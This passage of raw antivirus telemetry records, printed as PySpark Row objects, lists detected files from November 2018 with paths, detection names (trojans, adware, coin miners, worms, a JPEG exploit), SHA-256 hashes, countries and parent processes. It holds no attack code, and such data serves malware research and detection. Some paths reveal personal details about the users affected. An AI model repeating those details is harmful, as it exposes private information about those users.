  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:43:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141308-59d20d24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141308-59D20D24', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:13:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131919-db455fc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a7535d0\\AVSCAN-20181102-131858-D845BF8B\\AVSCAN-20181102-131919-DB455FC0', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='cf4df0069f8aa4b737a5ed9cd4c662ff20569888e7e7ede4ea95ba351e348979', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:19:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212001-3c690610', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_956d8945\\AVSCAN-20181102-210357-9072E9CB\\AVSCAN-20181102-212001-3C690610', filesize=20000, name='DR/FakePic.Gen.#M1.#R1'), hash='e6bb1606bfbebfcbe3b64da9c040159fc019a7bd34ff56bc385c995afd07d1e2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:20:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082141-5ddffcad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8160b79c\\AVSCAN-20181102-081646-3B9AB17F\\AVSCAN-20181102-082141-5DDFFCAD', filesize=1536000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='809373f0b818ac2617c2898b187f8c42a66ee3f6b5a672c35a6627dbbdd0ad21', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:47:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsb12F2.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8944344, timestamp='2018-11-02T03:27:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lxcpvnor.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LxcPvnOR.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.4\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bqvPMQAoWUaX83yA.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:55:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lucumeca.exe', filepath='C:\\Users\\Associate Dean Udgir\\AppData\\Roaming\\Lucumeca.exe', filesize=704000, name='Adware/DealPly.8899a4.#M1.#R1'), hash='8899a4e35c54bbb2e9e497cee939b492ac00d3eae8f38a774707e169e15baf6a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T01:07:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='v2smmxbdldd7na.x64.dll#a72a3e419eb03a67', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\v1\\20181101.172246\\220\\DDIGIICOUPPON\\V2SMMXbdLdd7Na.x64.dll#A72A3E419EB03A67', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='a1f7fa76543d5dc75fc1c0c6e64700002dae831cdef548ec70df6ed5e604632a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:09:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211525-33bbe038', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36a88796\\AVSCAN-20181102-211405-28EFA953\\AVSCAN-20181102-211525-33BBE038', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\Clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:59:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080331-6a4bc785', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-080331-6A4BC785', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d8a145ffb2b49fbd12f994726772bee6543d5cd51195e2abc12c3f6e8c71c1db', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='f2522a4e8d7e1f0554f0d7a8a6420b78a1aaf0543838282afb2a55d3a5d9b3f3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133542-84f90a4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d217db7c\\AVSCAN-20181102-132744-318067B9\\AVSCAN-20181102-133542-84F90A4D', filesize=192000, name='HEUR/AGEN.1018727.#M1.#R1'), hash='99141f65ef7f2f9c1425a13e0f8304f0c14104b182306e68d6ce6f6cd3645e96', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:36:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.pzirj.#M0.#R0'), hash='b96ac87412ee267e996e5becb9886b375b03ba199a90badcfc81ca247b513d41', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:00:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meatholes.12.04.29.martine.xxx.mp4-yapg.rar', filepath='G:\\MeatHoles.12.04.29.Martine.XXX.MP4-YAPG-1\\.tmp\\MeatHoles.12.04.29.Martine.XXX.MP4-YAPG.rar', filesize=768000, name='TR/Agent.htex.#M1.#R1'), hash='afe61955d12bb2bded854159aa25ba21f755182142d0b2d6a58b56fc28e95ad3', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T00:00:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274040001.scr', filepath='F:\\scan-peta-wb-sp2010\\3274040\\3274040001\\3274040001.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2ystfgskwpw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-02T10:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (1).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221501-5af8249d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221501-5AF8249D', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e37c7dfeb1788ce543c84070537d0a34ebd577e02b9d13cbc8a2fa61d929353b.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\22.10.2017-145.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1001135\\e37c7dfeb1788ce543c84070537d0a34ebd577e02b9d13cbc8a2fa61d929353b.MRG', filesize=2560000, name='HEUR/AGEN.1001135.#M1.#R1'), hash='e37c7dfeb1788ce543c84070537d0a34ebd577e02b9d13cbc8a2fa61d929353b', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\22.12.2017-246.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T15:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='91bfb55f56963f451e5bb8949e4eae3c9a0d4acfc7a46361d1b8725d830b96e7', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T09:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d639', filepath='C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d639', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESTsoft\\ALYac\\AYRTSrv.aye', parentsize=624192, timestamp='2018-11-02T05:11:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='teracopydisable.exe', filepath='H:\\HBCD\\Programs\\TERACOPYDISABLE.EXE', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='C:\\Users\\X\\Downloads\\Miracle_Box_2.27A_Full_Version-By-firmwareguide\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='d8778742e840c3fc333cb563e974225c9bbcc9f2a70060c887c5770e0468d346', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\baidu\\Baidu Browser\\spark.exe', parentsize=983056, timestamp='2018-11-04T12:06:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e770', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e770', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:01:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c27e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c27e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:29:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292219', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292219', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:06:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c2d3', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c2d3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:29:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='17b011b9c119ef58e674df826a442c6abfce9669', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\17b011b9c119ef58e674df826a442c6abfce9669', filesize=2240000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='f046dd36b63b65e63ae5ef4c8f44239e17bedaa7ebf2c02923f60bbde3fc9da6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:15:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291979', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291979', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:56:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-28-014525/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:24:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='launcher.dll', filepath='\\\\?\\D:\\GAMES\\ONLINE GAMES\\steam\\steamapps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='d75f93ad74999547e17e1e0b3c0880499d036a29d5314a17b21159f32bd53618', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023be0d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023be0d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:24:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205400-e4e1a9f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49ab1b27\\AVSCAN-20181104-205346-E2267EE6\\AVSCAN-20181104-205400-E4E1A9F3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:54:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e92fbb932f95d2b3eae41381e23419d2c04d11076fc5bb1ada4e79a36b2dd08d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E92FBB932F95D2B3EAE41381E23419D2C04D11076FC5BB1ADA4E79A36B2DD08D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e92fbb932f95d2b3eae41381e23419d2c04d11076fc5bb1ada4e79a36b2dd08d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:04:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='install.exe', filepath='c:\\_gcafepro\\Install.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='efff492fa9c08971d6e94cd9c048cf110233d66669f52d1568761113e2054bca', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:41:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:37:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='de903792ea55afaa587429189f2dd3ea98c1c692b964acf881df5892e2769de4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DE903792EA55AFAA587429189F2DD3EA98C1C692B964ACF881DF5892E2769DE4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='de903792ea55afaa587429189f2dd3ea98c1c692b964acf881df5892e2769de4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:15:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='\\\\?\\D:\\Office2007_Arb\\Office.ar-sa\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='f2ffd5f8b1f5bf94dc56f3115a2ed5baf5e7afc428038b42b15e44c09d7ae3d3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:56:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182905-8f83ea9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_732a2416\\AVSCAN-20181101-181636-14C56F4A\\AVSCAN-20181101-182905-8F83EA9F', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:30:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202159-35c28b35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e3058ce\\AVSCAN-20181101-201812-0B8138CA\\AVSCAN-20181101-202159-35C28B35', filesize=1216000, name='TR/Patched.Gen.#M1.#R1'), hash='f9e8de58ee6501e4d26ccdfe60b0a188a3a01487bff45d2dfb923d19204f23f2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:22:22Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='08f43c6819129dcd6dddc17bc0ae40fccffa5f9bb20560e3c42e585c18d380c1', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T01:59:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042657-26d68eaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd505e43\\AVSCAN-20181102-042454-163631FB\\AVSCAN-20181102-042657-26D68EAF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:26:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010741', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010741', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='js.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\FusionCharts\\ui\\js\\js.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:48Z'), dt=datetime.date(2018, 11, 2)),
